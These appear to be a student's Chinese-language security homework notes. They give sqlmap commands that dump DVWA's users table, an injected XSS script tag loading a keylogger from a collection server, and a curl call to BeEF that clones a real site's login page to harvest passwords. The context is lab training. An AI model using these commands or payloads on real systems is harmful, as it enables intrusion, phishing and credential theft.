第八周作业
作业:
使用 sqlmap 工具完成对 DVWA 数据库的注入过程,要求按照库、表、列、内容的顺序进行注入。
通过 python sqlmap.py -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=15oh0tk70iloel6s37gi4408c5;security=low" -p id --dbs
找到库

通过:python sqlmap.py -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=15oh0tk70iloel6s37gi4408c5;security=low" -p id -D dvwa --tables
找到表

屏幕剪辑的捕获时间: 2024/2/17 14:48
通过 python sqlmap.py -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=15oh0tk70iloel6s37gi4408c5;security=low" -p id -D dvwa -T users --columns
找到列

屏幕剪辑的捕获时间: 2024/2/17 14:49
通过:python sqlmap.py -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=15oh0tk70iloel6s37gi4408c5;security=low" -p id -D dvwa -T users -C last_name,password

练习课件上给出的 SQL 注入绕过方式。
XSS
使用 pikachu 平台练习 XSS 键盘记录、前台 XSS 盲打攻击获取 cookie;
修改 rk.js 脚本
插入 <script src="http://localhost:8083/pkxss/rkeypress/rk.js"></script>
登录后台可以看到

beef 制作钓鱼页面,克隆任意站点的登录页面并获取用户登录的账号密码。
下载 kali,然后安装 beef
克隆网页
curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https://account.geekbang.org/signin","mount":"/clone_site_geektimelog"}' -X POST http://172.19.218.40:3000/api/seng/clone_page?token=db86f7ae7c282fead5c1bb4017324681079d9f41

后台可以看到密码

评论